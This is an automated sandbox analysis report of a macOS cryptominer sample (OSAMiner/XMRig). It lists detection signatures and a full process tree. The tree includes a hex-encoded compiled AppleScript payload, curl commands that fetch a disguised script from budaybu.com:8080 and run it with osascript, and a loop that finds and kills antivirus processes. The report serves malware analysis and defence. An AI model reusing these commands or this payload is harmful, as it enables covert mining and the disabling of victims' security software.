Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report gqnmir4Hus

Overview

General Information

Sample Name:gqnmir4Hus
Analysis ID:1344210
MD5:831c1ec1b594ace3c97787b077ba9dac
SHA1:93b2653a4259d9c04e5b780762dc4abc40c49d35
SHA256:df550039acad9e637c7c3ec2a629abf8b3f35faca18e58d447f490cf23f114e8

Most interesting Screenshot:

Detection

OSAMiner Xmrig
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Yara detected OSAMiner
Yara detected Xmrig cryptocurrency miner
Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping indicative for miners
Found strings related to Crypto-Mining
Process executable has a file extension which is uncommon (probably to disguise the executable)
Scans the system for common Anti-Virus software
Writes compiled Apple script to disk (with potentially malicious intention)
Written Apple script contain uncommon file extension (probably to disguise the script)
Copies directory hierarchies, creates and/or extracts archives with shell command 'ditto'
Detected TCP or UDP traffic on non-standard ports
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "grep" command used to find patterns in files or piped streams
Executes the "mkdir" command used to create folders
Executes the "pgrep" command search for and/or send signals to processes
Executes the "ping" command used for connectivity testing via ICMP
Executes the "ps" command used to list the status of processes
Executes the "rm" command used to delete files or directories
Executes the "system_profiler" command used to collect detailed system hardware and software information
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl hardware model value (might be used for detecting VM presence)
Reads the systems hostname
Sample tries to kill a process (SIGKILL)
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes ZIP files to disk

Classification

Startup

  • System is mac1
  • sudo (MD5: 60ac5909d06d86e22aace3a863b13690) Arguments:
    • sudo New Fork (PID: 548, Parent: 547)
    • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Desktop/gqnmir4Hus.scpt
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c printf '%b' '\x46\x61\x73\x64\x55\x41\x53\x20\x31\x2E\x31\x30\x31\x2E\x31\x30\x0E\x00\x00\x00\x04\x0F\xFF\xFF\xFF\xFE\x00\x01\x00\x02\x01\xFF\xFF\x00\x00\x01\xFF\xFE\x00\x00\x0E\x00\x01\x00\x00\x0F\x10\x00\x02\x00\x06\xFF\xFD\x00\x03\x00\x04\x00\x05\x00\x06\x00\x07\x01\xFF\xFD\x00\x00\x10\x00\x03\x00\x04\xFF\xFC\xFF\xFB\xFF\xFA\xFF\xF9\x0B\xFF\xFC\x00\x05\x30\x00\x01\x65\x00\x00\x0B\xFF\xFB\x00\x05\x30\x00\x01\x64\x00\x00\x0B\xFF\xFA\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x0A\xFF\xF9\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x0E\x00\x04\x00\x07\x10\xFF\xF8\xFF\xF7\xFF\xF6\xFF\xF5\x00\x08\x00\x09\xFF\xF4\x0B\xFF\xF8\x00\x05\x30\x00\x01\x65\x00\x00\x01\xFF\xF7\x00\x00\x0E\xFF\xF6\x00\x02\x04\xFF\xF3\x00\x0A\x03\xFF\xF3\x00\x01\x0E\x00\x0A\x00\x01\x00\xFF\xF2\x0B\xFF\xF2\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xF5\x00\x00\x10\x00\x08\x00\x03\xFF\xF1\xFF\xF0\xFF\xEF\x0B\xFF\xF1\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xF0\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xEF\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x09\x00\x08\xFF\xEE\xFF\xED\xFF\xEC\xFF\xEB\xFF\xEA\xFF\xE9\xFF\xE8\xFF\xE7\x0A\xFF\xEE\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xED\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xEC\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xEB\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xEA\x00\x64\x0A\xFF\xE9\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xE8\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xE7\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xF4\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1E\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x05\x00\x07\x10\xFF\xE6\xFF\xE5\xFF\xE4\xFF\xE3\x00\x0B\x00\x0C\xFF\xE2\x0B\xFF\xE6\x00\x05\x30\x00\x01\x64\x00\x00\x01\xFF\xE5\x00\x00\x0E\xFF\xE4\x00\x02\x04\xFF\xE1\x00\x0D\x03\xFF\xE1\x00\x01\x0E\x00\x0D\x00\x01\x00\xFF\xE0\x0B\xFF\xE0\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x02\xFF\xE3\x00\x00\x10\x00\x0B\x00\x03\xFF\xDF\xFF\xDE\xFF\xDD\x0B\xFF\xDF\x00\x06\x30\x00\x02\x5F\x73\x00\x00\x0B\xFF\xDE\x00\x05\x30\x00\x01\x78\x00\x00\x0B\xFF\xDD\x00\x05\x30\x00\x01\x63\x00\x00\x10\x00\x0C\x00\x08\xFF\xDC\xFF\xDB\xFF\xDA\xFF\xD9\xFF\xD8\xFF\xD7\xFF\xD6\xFF\xD5\x0A\xFF\xDC\x00\x04\x0A\x49\x44\x20\x20\x0A\xFF\xDB\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xDA\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xD9\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x03\xFF\xD8\x00\x64\x0A\xFF\xD7\x00\x04\x0A\x70\x63\x6E\x74\x0A\xFF\xD6\x00\x04\x0A\x54\x45\x58\x54\x0A\xFF\xD5\x00\x08\x0B\x6B\x66\x72\x6D\x49\x44\x20\x20\x11\xFF\xE2\x00\x2B\xA0\xE0\x2C\x45\xB1\x4F\x17\x00\x1B\xA1\x5B\xE1\xE2\x6C\x0C\x00\x03\x6B\x68\x1B\x00\x02\xA2\xE4\x1F\xA2\xE5\x2C\x46\x5B\x4F\x59\xFF\xF3\x4F\x2A\xE6\xA1\xE7\x30\x45\x0F\x0F\x0E\x00\x06\x00\x07\x10\xFF\xD4\xFF\xD3\xFF\xD2\xFF\xD1\x00\x0E\x00\x0F\xFF\xD0\x0B\xFF\xD4\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xD3\x00\x00\x0E\xFF\xD2\x00\x02\x04\xFF\xCF\x00\x10\x03\xFF\xCF\x00\x01\x0E\x00\x10\x00\x01\x00\xFF\xCE\x0B\xFF\xCE\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x02\xFF\xD1\x00\x00\x10\x00\x0E\x00\x02\xFF\xCD\xFF\xCC\x0B\xFF\xCD\x00\x09\x30\x00\x05\x5F\x6E\x61\x6D\x65\x00\x00\x0B\xFF\xCC\x00\x07\x30\x00\x03\x5F\x69\x64\x00\x00\x10\x00\x0F\x00\x08\x00\x11\xFF\xCB\x00\x12\xFF\xCA\x00\x13\x00\x14\xFF\xC9\xFF\xC8\x0E\x00\x11\x00\x01\xB1\x00\x15\x11\x00\x15\x00\x1A\x00\x70\x00\x73\x00\x20\x00\x61\x00\x78\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x0A\xFF\xCB\x00\x04\x0A\x73\x74\x72\x71\x0E\x00\x12\x00\x01\xB1\x00\x16\x11\x00\x16\x00\x44\x00\x20\x00\x7C\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x2D\x00\x76\x00\x20\x00\x67\x00\x72\x00\x65\x00\x70\x00\x20\x00\x7C\x00\x20\x00\x61\x00\x77\x00\x6B\x00\x20\x00\x27\x00\x7B\x00\x70\x00\x72\x00\x69\x00\x6E\x00\x74\x00\x20\x00\x24\x00\x31\x00\x7D\x00\x27\x0A\xFF\xCA\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0E\x00\x13\x00\x01\xB1\x00\x17\x11\x00\x17\x00\x00\x0E\x00\x14\x00\x01\xB1\x00\x18\x11\x00\x18\x00\x10\x00\x6B\x00\x69\x00\x6C\x00\x6C\x00\x20\x00\x2D\x00\x39\x00\x20\x01\xFF\xC9\x00\x00\x02\xFF\xC8\x00\x00\x11\xFF\xD0\x00\x2C\x14\x00\x24\xE0\xA0\xE1\x2C\x25\xE2\x25\x6A\x0C\x00\x03\x45\xB1\x4F\xA1\xE4\x01\x1D\x00\x0C\xE5\xA1\x25\x6A\x0C\x00\x03\x59\x00\x03\x68\x57\x00\x08\x58\x00\x06\x00\x07\x68\x0F\x0E\x00\x07\x00\x07\x10\xFF\xC7\xFF\xC6\xFF\xC5\xFF\xC4\x00\x19\x00\x1A\xFF\xC3\x0A\xFF\xC7\x00\x18\x2E\x61\x65\x76\x74\x6F\x61\x70\x70\x6E\x75\x6C\x6C\x00\x00\x80\x00\x00\x00\x90\x00\x2A\x2A\x2A\x2A\x01\xFF\xC6\x00\x00\x01\xFF\xC5\x00\x00\x02\xFF\xC4\x00\x00\x10\x00\x19\x00\x01\xFF\xC2\x0B\xFF\xC2\x00\x05\x30\x00\x01\x69\x00\x00\x10\x00\x1A\x00\x30\x00\x1B\xFF\xC1\xFF\xC0\x00\x1C\xFF\xBF\x00\x1D\x00\x1E\xFF\xBE\xFF\xBD\xFF\xBC\x00\x1F\xFF\xBB\xFF\xBA\xFF\xB9\xFF\xB8\x00\x20\xFF\xB7\xFF\xB6\xFF\xB5\x00\x21\xFF\xB4\xFF\xB3\xFF\xB2\xFF\xB1\x00\x22\x00\x23\x00\x24\xFF\xB0\xFF\xAF\xFF\xAE\xFF\xAD\xFF\xAC\xFF\xAB\x00\x25\xFF\xAA\xFF\xA9\xFF\xA8\x00\x26\x00\x27\x00\x28\xFF\xA7\x00\x29\x00\x2A\x00\x2B\x00\x2C\x00\x2D\x00\x2E\x00\x2F\x0E\x00\x1B\x00\x01\xB1\x00\x30\x11\x00\x30\x00\x08\x00\x83\x00\x90\x00\x60\x00\x99\x0B\xFF\xC1\x00\x06\x30\x00\x02\x6D\x73\x00\x00\x0B\xFF\xC0\x00\x05\x30\x00\x01\x6E\x00\x00\x08\x00\x1C\x00\x08\x3F\xC9\x99\x99\x99\x99\x99\x9A\x0A\xFF\xBF\x00\x18\x2E\x73\x79\x73\x6F\x64\x65\x6C\x61\x6E\x75\x6C\x6C\xFF\xFF\x80\x00\xFF\xFF\x80\x00\x6E\x6D\x62\x72\x0F\x00\x1D\x01\xD4\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x65\x76\x73\x00\x02\x01\x00\x61\x6C\x69\x73\x00\x00\x00\x00\x01\x76\x00\x02\x00\x01\x03\x4D\x41\x43\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xCE\xA2\xE5\x88\x48\x2B\x00\x00\x00\x00\x00\x30\x11\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x30\x61\xCC\x08\x6F\x49\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x09\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0C\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x00\x10\x00\x08\x00\x00\xCE\xA2\x75\x08\x00\x00\x00\x11\x00\x08\x00\x00\xCC\x07\xFE\xC9\x00\x00\x00\x01\x00\x0C\x00\x00\x00\x30\x00\x00\x00\x2A\x00\x00\x00\x29\x00\x02\x00\x34\x4D\x41\x43\x3A\x53\x79\x73\x74\x65\x6D\x3A\x00\x4C\x69\x62\x72\x61\x72\x79\x3A\x00\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x3A\x00\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x0E\x00\x24\x00\x11\x00\x53\x00\x79\x00\x73\x00\x74\x00\x65\x00\x6D\x00\x20\x00\x45\x00\x76\x00\x65\x00\x6E\x00\x74\x00\x73\x00\x2E\x00\x61\x00\x70\x00\x70\x00\x0F\x00\x08\x00\x03\x00\x4D\x00\x41\x00\x43\x00\x12\x00\x2D\x53\x79\x73\x74\x65\x6D\x2F\x4C\x69\x62\x72\x61\x72\x79\x2F\x43\x6F\x72\x65\x53\x65\x72\x76\x69\x63\x65\x73\x2F\x53\x79\x73\x74\x65\x6D\x20\x45\x76\x65\x6E\x74\x73\x2E\x61\x70\x70\x00\x00\x13\x00\x01\x2F\x00\xFF\xFF\x00\x00\x0E\x00\x1E\x00\x01\xB1\x00\x31\x11\x00\x31\x00\x20\x00\x41\x00\x63\x00\x74\x00\x69\x00\x76\x00\x69\x00\x74\x00\x79\x00\x20\x00\x4D\x00\x6F\x00\x6E\x00\x69\x00\x74\x00\x6F\x00\x72\x0B\xFF\xBE\x00\x05\x30\x00\x01\x73\x00\x00\x0A\xFF\xBD\x00\x04\x0A\x70\x63\x61\x70\x0A\xFF\xBC\x00\x18\x2E\x63\x6F\x72\x65\x64\x6F\x65\x78\x62\x6F\x6F\x6C\x00\x00\x00\x00\x00\x00\x10\x00\x6F\x62\x6A\x20\x0E\x00\x1F\x00\x01\xB1\x00\x32\x11\x00\x32\x00\x08\x00\x2E\x00\x61\x00\x70\x00\x70\x0B\xFF\xBB\x00\x0C\x30\x00\x04\x6B\x70\x72\x6F\x00\x04\x6B\x50\x72\x6F\x01\xFF\xBA\x00\x00\x02\xFF\xB9\x00\x00\x03\xFF\xB8\x00\x0A\x0E\x00\x20\x00\x01\xB1\x00\x33\x11\x00\x33\x00\xD4\x00\xD4\x00\xD7\x00\x84\x00\xC5\x00\xDC\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xA9\x00\x84\x00\x8B\x00\x97\x00\x9A\x00\x94\x00\xE0\x00\xAF\x00\xC9\x00\xC9\x00\xD4\x00\xC9\x00\xD6\x00\xE0\x00\xB1\x00\xC5\x00\xC7\x00\xB1\x00\xCB\x00\xD6\x00\xE0\x00\xB0\x00\xC9\x00\xD1\x00\xD3\x00\xD2\x00\xE0\x00\xB1\x00\xC5\x00\xD0\x00\xDB\x00\xC5\x00\xD6\x00\xC9\x00\xE0\x00\xA5\x00\xDA\x00\xC5\x00\xD7\x00\xD8\x00\xE0\x00\xA5\x00\xDA\x00\xCD\x00\xD6\x00\xC5\x00\xE0\x00\xA7\x00\xD0\x00\xC9\x00\xC5\x00\xD2\x00\xB1\x00\xDD\x00\xB1\x00\xC5\x00\xC7\x00\x8B\x00\x84\x00\xE0\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\x91\x00\xDA\x00\x84\x00\xCB\x00\xD6\x00\xC9\x00\xD4\x00\x84\x00\xE0\x00\x84\x00\xC5\x00\xDB\x00\xCF\x00\x84\x00\x8B\x00\xDF\x00\xD4\x00\xD6\x00\xCD\x00\xD2\x00\xD8\x00\x84\x00\x88\x00\x95\x00\xE1\x00\x8B\x0B\xFF\xB7\x00\x05\x30\x00\x01\x64\x00\x00\x0A\xFF\xB6\x00\x18\x2E\x73\x79\x73\x6F\x65\x78\x65\x63\x54\x45\x58\x54\xFF\xFF\x80\x00\x00\x00\x00\x00\x54\x45\x58\x54\x0B\xFF\xB5\x00\x05\x30\x00\x01\x70\x00\x00\x0E\x00\x21\x00\x01\xB1\x00\x34\x11\x00\x34\x00\x00\x0A\xFF\xB4\x00\x04\x0A\x63\x70\x61\x72\x0A\xFF\xB3\x00\x04\x0A\x6B\x6F\x63\x6C\x0A\xFF\xB2\x00\x04\x0A\x63\x6F\x62\x6A\x0A\xFF\xB1\x00\x18\x2E\x63\x6F\x72\x65\x63\x6E\x74\x65\x2A\x2A\x2A\x2A\x00\x00\x00\x00\x00\x00\x10\x00\x2A\x2A\x2A\x2A\x0E\x00\x22\x00\x01\xB1\x00\x35\x11\x00\x35\x00\x10\x00\xCF\x00\xCD\x00\xD0\x00\xD0\x00\x84\x00\x91\x00\x9D\x00\x84\x0E\x00\x23\x00\x01\xB1\x00\x36\x11\x00\x36\x00\x12\x00\x49\x00\x6E\x00\x73\x00\x74\x00\x61\x00\x6C\x00\x6C\x00\x65\x00\x72\x0E\x00\x24\x00\x01\xB1\x00\x37\x11\x00\x37\x00\x28\x00\x93\x00\xDA\x00\xC5\x00\xD6\x00\x93\x00\xD0\x00\xD3\x00\xCB\x00\x93\x00\xCD\x00\xD2\x00\xD7\x00\xD8\x00\xC5\x00\xD0\x00\xD0\x00\x92\x00\xD0\x00\xD3\x00\xCB\x0A\xFF\xB0\
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/k.plist > /dev/null 2> /dev/null &
        • sh New Fork (PID: 551, Parent: 550)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/k.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 588, Parent: 587)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 589, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 590, Parent: 587)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 591, Parent: 587)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c kill -9 360
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 598, Parent: 597)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 599, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 600, Parent: 597)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 601, Parent: 597)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 604, Parent: 603)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 605, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 606, Parent: 603)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 607, Parent: 603)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 609, Parent: 608)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 610, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 611, Parent: 608)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 612, Parent: 608)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 615, Parent: 614)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 616, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 617, Parent: 614)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 618, Parent: 614)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 620, Parent: 619)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 621, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 622, Parent: 619)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 623, Parent: 619)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 626, Parent: 625)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 627, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 628, Parent: 625)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 629, Parent: 625)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 631, Parent: 630)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 632, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 633, Parent: 630)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 634, Parent: 630)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 637, Parent: 636)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 638, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 639, Parent: 636)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 640, Parent: 636)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
            • sh New Fork (PID: 642, Parent: 641)
            • ps (MD5: 792e18b1417ac1f184680d2423206e4f) Arguments: ps ax
            • sh New Fork (PID: 643, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -E 360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac
            • sh New Fork (PID: 644, Parent: 641)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 645, Parent: 641)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $1}
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/k.plist
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/k.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
        • sh New Fork (PID: 554, Parent: 553)
        • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
        • sh New Fork (PID: 555, Parent: 553)
        • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c ping -c 1 www.apple.com
      • ping (MD5: d91d8718ec1f2d5bcd4c02e7cad8282a) Arguments: ping -c 1 www.apple.com
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl http://www.budaybu100001.com:8080
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl http://www.budaybu100001.com:8080
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/budaybu.png -o ~/Library/11.png
      • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/budaybu.png -o /Users/henry/Library/11.png
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c osascript ~/Library/11.png > /dev/null 2> /dev/null &
        • sh New Fork (PID: 561, Parent: 560)
        • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript /Users/henry/Library/11.png
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c df -g / | grep / | grep -v grep | awk '{print $2}'
            • sh New Fork (PID: 563, Parent: 562)
            • df (MD5: 81164469cf7add4a64a67fc25d1f7e8a) Arguments: df -g /
            • sh New Fork (PID: 564, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep /
            • sh New Fork (PID: 565, Parent: 562)
            • grep (MD5: 2b3efb273296881708ea2914c612e0eb) Arguments: grep -v grep
            • sh New Fork (PID: 566, Parent: 562)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk {print $2}
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -d &> /dev/null & echo $!
            • sh New Fork (PID: 568, Parent: 567)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -d
